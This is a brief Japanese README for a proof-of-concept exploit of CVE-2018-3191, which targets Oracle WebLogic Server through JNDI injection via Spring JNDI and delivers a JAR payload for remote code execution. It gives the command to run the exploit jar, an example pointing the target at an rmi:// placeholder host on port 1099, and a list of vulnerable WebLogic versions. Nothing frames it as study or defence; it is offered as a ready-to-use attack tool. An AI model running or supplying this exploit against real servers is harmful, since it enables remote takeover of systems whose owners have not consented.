
JNDIインジェクションを介してWebLogic Serverを標的としたCVE-2018-3191の概念実証エクスプロイト。Spring JNDIを介してリモートコード実行をトリガーするJARペイロードを配信。
使用方法:
java -jar weblogic-spring-jndi.jar <jndi_address>
例:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
注意:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1